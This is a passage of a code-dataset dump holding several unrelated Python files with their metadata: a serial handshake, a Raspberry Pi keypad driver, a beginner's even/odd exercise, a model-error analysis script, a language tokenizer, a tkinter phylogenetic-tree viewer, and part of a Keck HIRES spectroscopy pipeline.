dts, url_create_fn, fname_create_fn, down_func, 
recursive=True\n    )\n\n\ndef run():\n    main(sys.argv[1:])\n","sub_path":"src/gldas/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":9853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"491553028","text":"import serial\nimport time\nser = serial.Serial(\"/dev/ttyACM0\", 9600, timeout=1)\n\n# Declare the Packet Codes for the Packet Type\nACK = b\"\\x00\"\nNACK = b\"\\x01\"\nHELLO = b\"\\x02\"\n\n# Handshake Flags\nhandshake_flag = True\n\n# Handshake condition\nwhile handshake_flag:\n    time.sleep(1) # 1 second pause timing\n    ser.write(HELLO) # Send Hello to Arduino\n    response = ser.read() # Read Arduino's response\n    reply = int.from_bytes(response,byteorder='big', signed=True)\n    if (reply == 0): # Check if the reply is an ACK\n        handshake_flag = False\n        ser.write(ACK) # If true, change flag and ACK\n        print('Handshake completed')\n","sub_path":"TestComsRPiCode.py","file_name":"TestComsRPiCode.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"482035166","text":"import RPi.GPIO as GPIO\nimport time\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(18, GPIO.IN, pull_up_down=GPIO.PUD_UP)\nGPIO.setup(23, GPIO.IN, pull_up_down=GPIO.PUD_UP)\n#GPIO.setup(24, GPIO.IN, pull_up_down=GPIO.PUD_UP)\n\n\n\nclass keypad:\n    def __init__(self):\n        self.lcd_out=False\n\n    def key_input(self):\n        #try:\n        while True:\n            up_state = GPIO.input(18)\n            select_state = GPIO.input(23)\n            #down_state = GPIO.input(24)\n            if not up_state:\n                #display.lcd_clear()\n                #display.lcd_long_write(display, \"up\", 1)\n                time.sleep(0.2)\n                return True\n            elif not select_state:\n                #display.lcd_clear()\n                #display.lcd_long_write(display, \"select\", 1)\n                time.sleep(0.2)\n                return False\n            #elif not down_state:\n                #display.lcd_clear()\n                #display.lcd_long_write(display, \"down\", 1)\n                #time.sleep(0.2)\n                #return True\n            \n            #if (not up_state) or (not select_state) or (not down_state):\n            #if not (up_state and select_state and down_state):\n                #display.lcd_clear()\n                #display.lcd_long_write(display, \"lcd_clear\", 1)\n                #time.sleep(1)\n                #break\n        #except KeyboardInterrupt:\n            #break\n\n#key = keypad()\n\n#key.key_input()\n    '''\n    def key_count(self,display, name):\n        \n        count = 0\n        while True:\n            up_state = GPIO.input(18)\n            select_state = GPIO.input(23)\n           # down_state = GPIO.input(24)\n            if not up_state:\n                time.sleep(0.5)\n                while True:\n                    if not up_state:\n                        time.sleep(0.2)\n                        count += 1\n                    if up_state:\n                        time.sleep(0.2)\n                        break\n                return count\n            elif not select_state:\n                time.sleep(0.2)\n                return False\n        \n        display.lcd_clear()\n        display.lcd_long_write(display, name + ' : ', 1)\n        count = 0\n        while True:\n            putB = key_input()\n            if putB:\n                time.sleep(0.5)\n                count += 1\n                display.lcd_long_write(display, str(count), 2)\n                while True:\n                    putB = key_input()\n                    if putB:\n                        time.sleep(0.2)\n                        count += 1\n                        display.lcd_long_write(display, str(count), 2)\n                        #time.sleep(0.2)\n                    elif not putB:\n                        time.sleep(0.2)\n                        break\n            \n            #break\n        return count\n'''","sub_path":"!1215minor/keypaddriver.py","file_name":"keypaddriver.py","file_ext":"py","file_size_in_byte":2843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"7729029","text":"# Write a Python program that asks the user to enter an integer and then tells them whether that number is even or odd\n\n# -*- coding: utf-8 -*-\n\nn = input(\"Enter the value of n: \") # When the user types the value of the integer \"n\", that value is stored in the variable \"n\"\n# To check whether the integer \"n\" is even or odd, we first convert \"n\" to an integer\nn = int(n)\n# Once the value has been typed and stored in the integer \"n\", we check whether this integer \"n\" is even or odd\n# For that, we use the modulo operator\n\nr = n % 2 # r is the remainder of the division of n by 2\nif r == 0: # the \"if\" condition\n    print(\"The number n you typed is even\") # the \"if...else\" condition\nelse: # here we use the if...else condition (\"if...elif...else\")\n    print(\"The number n you typed is odd\")\n","sub_path":"Exercice_Python/Premier exo sur Python/3-Nombre Pair ou Impair .py","file_name":"3-Nombre Pair ou Impair .py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"575889868","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 17 14:50:26 2020\n\n@author: RileyBallachay\n\"\"\"\nimport numpy as np\nimport scipy\nimport matplotlib.pyplot as plt\nfrom Signal import Signal\nfrom Model import Model\nimport pandas as pd\nfrom os import path\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.preprocessing import PolynomialFeatures\n\nerrorCSV = \"/Users/RileyBallachay/Documents/Fifth Year/RNNSystemIdentification/Uncertainty/rawDataNew.csv\"\n# These constants are also defined in the Signal module \n# Don't change here unless you also change them there\nnumTrials = 1000\nnstep = 100\ntimelength = 100\ntrainFrac = .7\n\nif not(path.exists(errorCSV)):\n    # Initialize the models that are saved using the parameters declared above\n    predictor = Model(nstep)\n    predictor.load_FOPTD()\n    \n    deviations = np.arange(0,5)\n    \n    stdev = np.array([0])\n    error=np.array([0])\n    kp_pred = np.array([0])\n    theta_pred = np.array([0])\n    tau_pred = np.array([0])\n    \n    kp_true = np.array([0])\n    theta_true = np.array([0])\n    tau_true = np.array([0])\n    \n    for deviation in deviations:\n        # then simulates using the initialized model\n        sig = Signal(numTrials,nstep,timelength,trainFrac)\n        sig.training_simulation(KpRange=[0.5,10],tauRange=[0.5,10],thetaRange=[0.5,10])\n        \n        # In this case, since we are only loading the model, not trying to train it,\n        # we can use function simulate and preprocess\n        xData,yData = sig.simulate_and_preprocess(stdev=deviation)\n        \n        # Function to make predictions based off the simulation \n        predictor.predict(sig,savePredict=False,plotPredict=False)\n        \n        error = np.concatenate((predictor.errors,error))\n        kp_pred = np.concatenate((predictor.kpPredictions[:,0],kp_pred))\n        theta_pred = np.concatenate((predictor.thetaPredictions[:,0],theta_pred))\n        tau_pred = np.concatenate((predictor.tauPredictions[:,0],tau_pred))\n        \n        kp_true = np.concatenate((sig.kps,kp_true))\n        theta_true = np.concatenate((sig.thetas,theta_true))\n        tau_true = np.concatenate((sig.taus,tau_true))\n        stdev = np.concatenate((np.full_like(predictor.errors,deviation),stdev))\n    \n    sd = pd.DataFrame()\n    sd['stdev'] = stdev\n    sd['mse'] = error\n    sd['kpPred'] = kp_pred\n    sd['tauPred'] = tau_pred\n    sd['thetaPred'] = theta_pred\n    sd['kpTrue'] = kp_true\n    sd['tauTrue'] = tau_true\n    sd['thetaTrue'] = theta_true\n    \n    sd.to_csv(errorCSV, index=False)\n    \nelse:\n    try:\n        sd = pd.read_csv(errorCSV).drop(['Unnamed: 0'],axis=1)\n        sd.drop(sd.tail(1).index,inplace=True)\n    except:\n        sd = pd.read_csv(errorCSV)\n        sd.drop(sd.tail(1).index,inplace=True)\n    
\n \n\nprefixes = ['kp','tau','theta']\nfor prefix in prefixes:\n sd[prefix+'Error'] = (sd[prefix+'Pred']-sd[prefix+'True'])\n\n hist = np.histogram(sd[prefix+'Error'],bins=100)\n plt.figure(dpi=100)\n plt.hist(sd[prefix+'Error'],bins=100)\n \n h = np.std(sd[prefix+'Error'])\n print(h)\n \n plt.figure(dpi=200)\n plt.plot(sd[prefix+'True'],sd[prefix+'Pred'],'.')\n haha = np.linspace(1,10)+h\n plt.plot(np.linspace(1,10),np.linspace(1,10),'r--')\n plt.plot(np.linspace(1,10),np.linspace(1,10)+h,'g--')\n plt.plot(np.linspace(1,10),np.linspace(1,10)-h,'g--')\n\n\n","sub_path":"Extras/Old Scripts/test_probability_distribution.py","file_name":"test_probability_distribution.py","file_ext":"py","file_size_in_byte":3388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"515565104","text":"from collections import OrderedDict\n\nclass BreakoutLoop(Exception):\n pass\n\nclass Token(object):\n def __init__(self, _type, line, index, value=None):\n self.type = _type\n self.value = value\n self.lineNumber = line\n self.charIndex = index\n\n def __repr__(self):\n return 'Token(' + self.type + ')' + ((' => ' + self.value) if self.value != None else '')\n\nclass Tokenizer(object):\n ALPHA = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ')\n NUM = list('0123456789')\n TOKEN_MAP = OrderedDict([\n ('!=', 'operator_neq'),\n ('==', 'operator_eq'),\n ('>=', 'operator_gte'),\n ('<=', 'operator_lte'),\n ('&&', 'operator_and'),\n ('||', 'operator_or'),\n ('!', 'operator_not'),\n ('=', 'operator_assign'),\n ('>', 'operator_gt'),\n ('<', 'operator_lt'),\n ('[', 'sqr_bracket_open'),\n (']', 'sqr_bracket_close'),\n ('(', 'parentheses_open'),\n (';', 'statemend_end'),\n ('{', 'bracket_open'),\n ('}', 'bracket_close'),\n (')', 'parentheses_close'),\n (',', 'seperator'),\n ('.', 'dot'),\n ('+', 'operator_addition'),\n ('-', 'operator_subtraction'),\n ('*', 'operator_multiplication'),\n ('/', 'operator_division')\n ])\n\n def __init__(self, source):\n self.source = source\n self.index = 0\n self.charIndex = 1\n self.lineNumber = 1\n\n @property\n def any(self):\n return self.index < len(self.source)\n\n @property\n def cur(self):\n return self.source[self.index:self.index + 1]\n\n def starts(self, chr, peek=None):\n if isinstance(chr, list):\n for sub in chr:\n if self.starts(sub, peek):\n return True\n \n return False\n\n index = self.index if peek == None else self.index + peek\n length = len(chr)\n cur = self.source[index:index + length]\n\n return cur == chr\n\n def next(self, n=1):\n self.index += n\n self.charIndex += n\n\n if self.cur == '\\n':\n self.lineNumber += 1\n self.charIndex = 1\n\n def identifier(self):\n ident = ''\n\n while self.any and (self.starts(self.ALPHA) or (len(ident) > 0 and self.starts(self.NUM + ['_']))):\n ident += self.cur\n self.next()\n\n return self.makeToken('identifier', ident)\n\n def string(self):\n value = ''\n line = self.lineNumber\n char = self.charIndex\n\n self.next()\n\n while self.any and not self.starts('\\''):\n if self.starts('\\\\') and self.starts('\\'', peek=1):\n value += '\\''\n self.next(2)\n continue\n\n value += self.cur\n self.next()\n\n if self.cur != '\\'':\n raise Exception('Expecting STRING_END instead got: ' + self.cur)\n\n self.next()\n\n return Token('string', line, char, value)\n\n def number(self):\n value = ''\n\n while self.any and self.starts(self.NUM):\n value += self.cur\n self.next()\n\n return self.makeToken('number', value)\n \n def makeToken(self, _type, value=None):\n return 
Token(_type, self.lineNumber, self.charIndex, value)\n \n def autoStatemendEnd(self, tokens, isTail=False):\n autoTypes = [\n 'statemend_end',\n 'bracket_open',\n 'bracket_close'\n ]\n\n if not isTail and not self.starts(['\\t', '\\n']):\n return False\n\n return len(tokens) > 0 and len([t for t in autoTypes if tokens[-1].type == t]) == 0\n \n def skipComment(self):\n self.next(2)\n\n while self.any:\n if self.starts('\\n'):\n self.next()\n break\n \n self.next()\n \n def parseType(self):\n basics = ['bool', 'string', 'number']\n\n for name in basics:\n if self.starts(name):\n self.next(len(name))\n return name\n \n if self.starts('array<'):\n self.next(6)\n\n innerType = ''\n\n while self.any:\n if self.cur == '>':\n self.next()\n break\n\n innerType += self.cur\n self.next()\n \n return 'array<' + innerType + '>'\n\n def tokenize(self):\n tokens = []\n\n while self.any:\n if self.autoStatemendEnd(tokens):\n tokens.append(self.makeToken('statemend_end'))\n\n if self.starts('//'):\n self.skipComment()\n elif self.starts([' ', '\\t', '\\n', '\\r']):\n self.next()\n elif self.starts('import '):\n tokens.append(self.makeToken('import'))\n self.next(7)\n elif self.starts('fn '):\n tokens.append(self.makeToken('function'))\n self.next(3)\n elif self.starts('each '):\n tokens.append(self.makeToken('foreach'))\n self.next(5)\n elif self.starts('return '):\n tokens.append(self.makeToken('return'))\n self.next(7)\n elif self.starts('if '):\n tokens.append(self.makeToken('if'))\n self.next(3)\n elif self.starts('in '):\n tokens.append(self.makeToken('operator_in'))\n self.next(3)\n elif self.starts('else '):\n tokens.append(self.makeToken('else'))\n self.next(5)\n elif self.starts('elif '):\n tokens.append(self.makeToken('elseif'))\n self.next(5)\n elif self.starts([ 'number', 'bool', 'string' ]):\n tokens.append(self.makeToken('type', self.parseType()))\n elif self.starts('array<'):\n tokens.append(self.makeToken('type', self.parseType()))\n elif self.starts(self.ALPHA):\n token = self.identifier()\n\n if token.value == 'true' or token.value == 'false':\n tokens.append(self.makeToken('boolean', token.value))\n else:\n tokens.append(token)\n elif self.starts('\\''):\n tokens.append(self.string())\n elif self.starts(self.NUM):\n tokens.append(self.number())\n else:\n try:\n for char, typeName in self.TOKEN_MAP.items():\n if self.starts(char):\n tokens.append(self.makeToken(typeName))\n self.next(len(char))\n raise BreakoutLoop()\n except BreakoutLoop:\n continue\n\n raise Exception('Unknown character `' + self.cur + '` on line ' + str(self.lineNumber))\n\n if self.autoStatemendEnd(tokens, isTail=True):\n tokens.append(self.makeToken('statemend_end'))\n\n return tokens\n","sub_path":"src/compiler/tokenizer.py","file_name":"tokenizer.py","file_ext":"py","file_size_in_byte":7055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"165895429","text":"\"\"\"Simple interface for watching created trees. Definitely not best piece of code but it works.\"\"\"\n\nfrom tkinter import *\nfrom nodes import *\nfrom collections import deque\n\n\nclass MappedPoint:\n\n def __init__(self, pos_x, pos_y):\n self.pos_x = pos_x\n self.pos_y = pos_y\n\n\n# Function that draws lines connecting points a and b. 
It is also returning new point - center of connection.\ndef _connect_points(a, b, canvas):\n if b.pos_x > a.pos_x:\n a, b = b, a\n canvas.create_line(a.pos_x, a.pos_y, b.pos_x - 20, a.pos_y)\n canvas.create_line(b.pos_x, b.pos_y, b.pos_x - 20, b.pos_y)\n canvas.create_line(b.pos_x - 20, a.pos_y, b.pos_x - 20, b.pos_y)\n return MappedPoint(b.pos_x - 20, (a.pos_y + b.pos_y) / 2)\n\n\n# nodes_list is list of nodes in order of connecting them\n# seq_list is a list of sequences, which is needed to write them also in right order\ndef _map_tree(node, nodes_list, seq_list):\n nodes_list.appendleft(node)\n\n if isinstance(node.left, Leaf):\n seq_list.append(node.left)\n else:\n _map_tree(node.left, nodes_list, seq_list)\n\n if isinstance(node.right, Leaf):\n seq_list.append(node.right)\n else:\n _map_tree(node.right, nodes_list, seq_list)\n\n\ndef _draw_tree(tree, canvas):\n x = 600\n y = 500\n nodes_list = deque()\n seq_list = list()\n _map_tree(tree, nodes_list, seq_list)\n\n canvas.delete(\"all\")\n\n # points is a dictionary storing points by a nodes and leafs unique numbers\n points = dict()\n for i, seq in enumerate(seq_list, 0):\n canvas.create_text(x, y - i * 20, text=str(seq))\n points[seq.number] = MappedPoint(x - 30, y - i * 20)\n\n while nodes_list:\n node = nodes_list.popleft()\n point_a = points[node.left.number]\n point_b = points[node.right.number]\n new_point = _connect_points(point_a, point_b, canvas)\n points[node.number] = new_point\n canvas.create_oval(new_point.pos_x - 6, new_point.pos_y - 6,\n new_point.pos_x + 6, new_point.pos_y + 6,\n fill=\"black\")\n canvas.create_text(new_point.pos_x, new_point.pos_y, text=str(node.bootstrap), fill=\"#00FFF9\")\n\n\ndef run_graphics(trees):\n\n tree_index = 0\n max_index = len(trees) - 1\n\n def scroll_start(event):\n canvas.scan_mark(event.x, event.y)\n\n def scroll_move(event):\n canvas.scan_dragto(event.x, event.y, gain=1)\n\n def previous_tree(event):\n nonlocal canvas\n nonlocal tree_index\n\n if tree_index == 0:\n return\n\n tree_index -= 1\n _draw_tree(trees[tree_index][0], canvas)\n canvas.create_text(750, 550, text=str(tree_index + 1))\n canvas.create_text(750, 580, text=str(trees[tree_index][1]))\n\n def next_tree(event):\n nonlocal canvas\n nonlocal tree_index\n nonlocal max_index\n\n if tree_index == max_index:\n return\n\n tree_index += 1\n _draw_tree(trees[tree_index][0], canvas)\n if tree_index == max_index:\n canvas.create_text(750, 550, text=\"BEST TREE! 
\" + str(tree_index + 1))\n else:\n canvas.create_text(750, 550, text=str(tree_index + 1))\n canvas.create_text(750, 580, text=str(trees[tree_index][1]))\n\n root = Tk()\n root.title(\"Phylogenetic tree\")\n root.geometry('800x600')\n\n # These are mainly configurations for scrolling since our trees can get big really fast\n canvas = Canvas(root, width=800, height=600)\n xsb = Scrollbar(root, orient=\"horizontal\", command=canvas.xview)\n ysb = Scrollbar(root, orient=\"vertical\", command=canvas.yview)\n canvas.configure(bg=\"white\", yscrollcommand=ysb.set, xscrollcommand=xsb.set)\n canvas.configure(scrollregion=(-1000, -1000, 1000, 1000))\n\n xsb.grid(row=1, column=0, sticky=\"ew\")\n ysb.grid(row=0, column=1, sticky=\"ns\")\n canvas.grid(row=0, column=0, sticky=\"nsew\")\n\n canvas.bind(\"\", scroll_start)\n canvas.bind(\"\", scroll_move)\n root.bind(\"a\", previous_tree)\n root.bind(\"d\", next_tree)\n\n _draw_tree(trees[tree_index][0], canvas)\n canvas.create_text(750, 550, text=str(tree_index + 1))\n canvas.create_text(750, 580, text=str(trees[tree_index][1]))\n\n root.mainloop()\n","sub_path":"src/graphic_tree.py","file_name":"graphic_tree.py","file_ext":"py","file_size_in_byte":4251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"649001497","text":"import os\nimport re\nimport logging\nlogger = logging.getLogger(__name__)\nimport configparser\n\nimport numpy as np\nfrom scipy.ndimage.filters import gaussian_filter\nimport astropy.io.fits as fits\nfrom astropy.table import Table\nfrom astropy.time import Time\n\nfrom ..echelle.imageproc import combine_images\nfrom ..echelle.trace import find_apertures, load_aperture_set, TraceFigureCommon\nfrom ..echelle.background import simple_debackground\nfrom ..echelle.extract import extract_aperset\nfrom ..echelle.flat import get_slit_flat\nfrom ..utils.obslog import parse_num_seq, read_obslog\nfrom ..utils.misc import extract_date\n\nfrom .common import FormattedInfo\n\nall_columns = [\n ('frameid', 'int', '{:^7s}', '{0[frameid]:7d}'),\n ('fileid', 'str', '{:^17s}', '{0[fileid]:17s}'),\n ('imgtype', 'str', '{:^7s}', '{0[imgtype]:^7s}'),\n ('object', 'str', '{:^20s}', '{0[object]:20s}'),\n ('i2cell', 'bool', '{:^6s}', '{0[i2cell]!s: <6}'),\n ('exptime', 'float', '{:^7s}', '{0[exptime]:7g}'),\n ('obsdate', 'time', '{:^23s}', '{0[obsdate]:}'),\n ('deckname', 'str', '{:^8s}', '{0[deckname]:^8s}'),\n ('filter1', 'str', '{:^7s}', '{0[filter1]:^7s}'),\n ('filter2', 'str', '{:^7s}', '{0[filter2]:^7s}'),\n ('nsat_1', 'int', '{:^8s}', '\\033[34m{0[nsat_1]:8d}\\033[0m'),\n ('nsat_2', 'int', '{:^8s}', '\\033[32m{0[nsat_2]:8d}\\033[0m'),\n ('nsat_3', 'int', '{:^8s}', '\\033[31m{0[nsat_3]:8d}\\033[0m'),\n ('q95_1', 'int', '{:^8s}', '\\033[34m{0[q95_1]:8d}\\033[0m'),\n ('q95_2', 'int', '{:^8s}', '\\033[32m{0[q95_2]:8d}\\033[0m'),\n ('q95_3', 'int', '{:^8s}', '\\033[31m{0[q95_3]:8d}\\033[0m'),\n ]\n\ndef print_wrapper(string, item):\n \"\"\"A wrapper for log printing for HIRES pipeline.\n\n Args:\n string (str): The output string for wrapping.\n item (:class:`astropy.table.Row`): The log item.\n\n Returns:\n str: The color-coded string.\n\n \"\"\"\n imgtype = item['imgtype']\n obj = item['object']\n\n if len(obj)>=4 and obj[0:4]=='bias':\n # bias images, use dim (2)\n return '\\033[2m'+string.replace('\\033[0m', '')+'\\033[0m'\n\n elif imgtype=='sci':\n # sci images, use highlights (1)\n return '\\033[1m'+string.replace('\\033[0m', '')+'\\033[0m'\n\n elif len(obj)>=8 and obj[0:8]=='flatlamp':\n # flat 
images, analyze nsat\n nsat_1 = item['nsat_1']\n nsat_2 = item['nsat_2']\n nsat_3 = item['nsat_3']\n q95_1 = item['q95_1']\n q95_2 = item['q95_2']\n q95_3 = item['q95_3']\n q_lst = [q95_1 if q95_1 < 6e4 else -1,\n q95_2 if q95_2 < 6e4 else -1,\n q95_3 if q95_3 < 6e4 else -1]\n\n maxccd = np.argmax(q_lst)\n\n if max(q_lst)<0:\n # all CCDs are saturated\n return string\n\n elif 'quartz1' in obj and maxccd == 0:\n # quartz1 for UV, use light magenta (95)\n return '\\033[95m'+string.replace('\\033[0m', '')+'\\033[0m'\n\n elif maxccd == 0:\n # blue flat, use light blue (94)\n return '\\033[94m'+string.replace('\\033[0m', '')+'\\033[0m'\n\n elif maxccd == 1:\n # green flat, use light green (92)\n return '\\033[92m'+string.replace('\\033[0m', '')+'\\033[0m'\n\n elif maxccd == 2:\n # red flat, use light red (91)\n return '\\033[91m'+string.replace('\\033[0m', '')+'\\033[0m'\n\n else:\n # no idea\n return string\n\n elif len(obj)>=7 and obj[0:7]=='arclamp':\n # arc lamp, use light yellow (93)\n return '\\033[93m'+string.replace('\\033[0m', '')+'\\033[0m'\n else:\n return string\n\n\ndef make_config():\n \"\"\"Generate a config file for reducing the data taken with Xinglong 2.16m\n HRS.\n\n\n \"\"\"\n # find date of data obtained\n current_pathname = os.path.basename(os.getcwd())\n guess_date = extract_date(current_pathname)\n\n while(True):\n if guess_date is None:\n prompt = 'YYYYMMDD'\n else:\n prompt = guess_date\n\n string = input('Date of observation [{}]: '.format(prompt))\n input_date = extract_date(string)\n if input_date is None:\n if guess_date is None:\n continue\n else:\n input_date = guess_date\n break\n else:\n break\n \n input_datetime = datetime.datetime.strptime(input_date, '%Y-%m-%d')\n\n # create config object\n config = configparser.ConfigParser()\n\n config.add_section('data')\n\n config.set('data', 'telescope', 'Keck-I')\n config.set('data', 'instrument', 'HIRES')\n config.set('data', 'rawpath', 'rawdata')\n #config.set('data', 'statime_key', statime_key)\n #config.set('data', 'exptime_key', exptime_key)\n\n config.add_section('reduce')\n config.set('reduce', 'midpath', 'midproc')\n config.set('reduce', 'figpath', 'images')\n config.set('reduce', 'odspath', 'onedspec')\n config.set('reduce', 'mode', 'normal')\n config.set('reduce', 'oned_suffix', 'ods')\n config.set('reduce', 'fig_format', 'png')\n \n config.add_section('reduce.bias')\n config.set('reduce.bias', 'bias_file', '${reduce:midpath}/bias.fits')\n config.set('reduce.bias', 'cosmic_clip', str(10))\n config.set('reduce.bias', 'maxiter', str(5))\n config.set('reduce.bias', 'smooth', 'yes')\n config.set('reduce.bias', 'smooth_method', 'gaussian')\n config.set('reduce.bias', 'smooth_sigma', str(3))\n config.set('reduce.bias', 'smooth_mode', 'nearest')\n\n config.add_section('reduce.trace')\n config.set('reduce.trace', 'minimum', str(1e-3))\n config.set('reduce.trace', 'scan_step', str(100))\n config.set('reduce.trace', 'separation', '100:84, 1500:45, 3000:14')\n config.set('reduce.trace', 'filling', str(0.2))\n config.set('reduce.trace', 'align_deg', str(2))\n config.set('reduce.trace', 'display', 'no')\n config.set('reduce.trace', 'degree', str(4))\n config.set('reduce.trace', 'file', '${reduce:midpath}/trace.fits')\n\n config.add_section('reduce.flat')\n config.set('reduce.flat', 'file', '${reduce:midpath}/flat.fits')\n\n # write to config file\n filename = 'HIRES.{}.cfg'.format(input_date)\n outfile = open(filename, 'w')\n for section in config.sections():\n maxkeylen = max([len(key) for key in 
config[section].keys()])\n outfile.write('[{}]'.format(section)+os.linesep)\n fmt = '{{:{}s}} = {{}}'.format(maxkeylen)\n for key, value in config[section].items():\n outfile.write(fmt.format(key, value)+os.linesep)\n outfile.write(os.linesep)\n outfile.close()\n\n print('Config file written to {}'.format(filename))\n \n\ndef parse_3ccd_images(hdu_lst):\n \"\"\"Parse the 3 CCD images.\n\n Args:\n hdu_lst (:class:`astropy.io.fits.HDUList`): Input HDU list.\n\n Returns:\n tuple: A tuple containing:\n\n * **data_lst** (*tuple*): A tuple of (Image1, Image2, Image3).\n * **mask_lst** (*tuple*): A tuple of (Mask1, Mask2, Mask3).\n\n \"\"\"\n if len(hdu_lst) != 4:\n raise ValueError\n\n # get CCD Binning\n tmp = hdu_lst[0].header['CCDSUM'].split()\n binx, biny = int(tmp[0]), int(tmp[1])\n # get data sect rectanle\n dataset_lst = {(2, 1): ('[7:1030,1:4096]', (6, 1030), (0, 4096)),\n (2, 2): ('[7:1030,1:2048]', (6, 1030), (0, 2048)),\n }\n datasec, (x1, x2), (y1, y2) = dataset_lst[(binx, biny)]\n # get data section\n data_lst = [hdu_lst[i+1].data[y1:y2, x1:x2] for i in range(3)\n if hdu_lst[i+1].header['DATASEC']==datasec]\n\n # get saturated masks\n mask_sat1 = data_lst[0]==65535 # for UV CCD, saturated pixels are 65535.\n mask_sat2 = data_lst[1]==0 # for green & red CCDs, saturated pixels\n mask_sat3 = data_lst[2]==0 # are 0.\n # get bad pixel masks\n #mask_bad1 = np.zeros_like(mask_sat1, dtype=np.bool)\n #mask_bad2 = np.zeros_like(mask_sat1, dtype=np.bool)\n #mask_bad3 = np.zeros_like(mask_sat1, dtype=np.bool)\n mask_bad1 = get_badpixel_mask((binx, biny), ccd=1)\n mask_bad2 = get_badpixel_mask((binx, biny), ccd=2)\n mask_bad3 = get_badpixel_mask((binx, biny), ccd=3)\n # pack masks\n mask1 = np.int16(mask_sat1)*4 + np.int16(mask_bad1)*2\n mask2 = np.int16(mask_sat2)*4 + np.int16(mask_bad2)*2\n mask3 = np.int16(mask_sat3)*4 + np.int16(mask_bad3)*2\n\n mask_lst = (mask1, mask2, mask3)\n\n # fix saturated pixels in the green and red CCDs\n data_lst[1][mask_sat2] = 65535\n data_lst[2][mask_sat3] = 65535\n\n return (data_lst, mask_lst)\n\ndef make_obslog(path):\n \"\"\"Scan the raw data, and generated a log file containing the detail\n information for each frame.\n\n An ascii file will be generated after running. 
The name of the ascii file is\n `YYYY-MM-DD.log`.\n\n Args:\n path (str): Path to the raw FITS files.\n\n \"\"\"\n name_pattern = '^HI\\.\\d{8}\\.\\d{5}\\.fits$'\n\n # scan the raw files\n fname_lst = sorted(os.listdir(path))\n\n # prepare logtable\n logtable = Table(dtype=[\n ('frameid', 'i2'), ('fileid', 'S17'), ('imgtype', 'S3'),\n ('object', 'S20'), ('i2cell', 'bool'), ('exptime', 'f4'),\n ('obsdate', Time),\n ('deckname', 'S2'), ('filter1', 'S5'), ('filter2', 'S5'),\n ('nsat_1', 'i4'), ('nsat_2', 'i4'), ('nsat_3', 'i4'),\n ('q95_1', 'i4'), ('q95_2', 'i4'), ('q95_3', 'i4'),\n ])\n\n # prepare infomation to print\n pinfo = FormattedInfo(all_columns,\n ['frameid', 'fileid', 'imgtype', 'object', 'i2cell', 'exptime',\n 'obsdate', 'deckname', 'nsat_2', 'q95_2'])\n\n # print header of logtable\n print(pinfo.get_separator())\n print(pinfo.get_title())\n print(pinfo.get_separator())\n\n # start scanning the raw files\n prev_frameid = -1\n for fname in fname_lst:\n if not re.match(name_pattern, fname):\n continue\n fileid = fname[0:17]\n filename = os.path.join(path, fname)\n hdu_lst = fits.open(filename)\n # parse images\n data_lst, mask_lst = parse_3ccd_images(hdu_lst)\n\n head0 = hdu_lst[0].header\n\n frameid = prev_frameid + 1\n\n # get obsdate in 'YYYY-MM-DDTHH:MM:SS' format\n date = head0.get('DATE-OBS')\n utc = head0.get('UTC', head0.get('UT'))\n obsdate = Time('%sT%s'%(date, utc))\n\n exptime = head0.get('ELAPTIME')\n i2in = head0.get('IODIN', False)\n i2out = head0.get('IODOUT', True)\n i2cell = i2in\n imagetyp = head0.get('IMAGETYP')\n targname = head0.get('TARGNAME', '')\n lampname = head0.get('LAMPNAME', '')\n\n if imagetyp == 'object':\n # science frame\n imgtype = 'sci'\n objectname = targname\n elif imagetyp == 'flatlamp':\n # flat\n imgtype = 'cal'\n objectname = '{} ({})'.format(imagetyp, lampname)\n elif imagetyp == 'arclamp':\n # arc lamp\n imgtype = 'cal'\n objectname = '{} ({})'.format(imagetyp, lampname)\n elif imagetyp == 'bias':\n imgtype = 'cal'\n objectname = 'bias'\n else:\n print('Unknown IMAGETYP:', imagetyp)\n\n # get deck and filter information\n deckname = head0.get('DECKNAME', '')\n filter1 = head0.get('FIL1NAME', '')\n filter2 = head0.get('FIL2NAME', '')\n\n # determine the numbers of saturated pixels for 3 CCDs\n mask_sat1 = (mask_lst[0] & 4)>0\n mask_sat2 = (mask_lst[1] & 4)>0\n mask_sat3 = (mask_lst[2] & 4)>0\n nsat_1 = mask_sat1.sum()\n nsat_2 = mask_sat2.sum()\n nsat_3 = mask_sat3.sum()\n\n # find the 95% quantile\n q95_lst = [np.sort(data.flatten())[int(data.size*0.95)]\n for data in data_lst]\n q95_1, q95_2, q95_3 = q95_lst\n\n # close the fits file\n hdu_lst.close()\n\n item = [frameid, fileid, imgtype, objectname, i2cell, exptime, obsdate,\n deckname, filter1, filter2,\n nsat_1, nsat_2, nsat_3, q95_1, q95_2, q95_3]\n\n logtable.add_row(item)\n # get table Row object. 
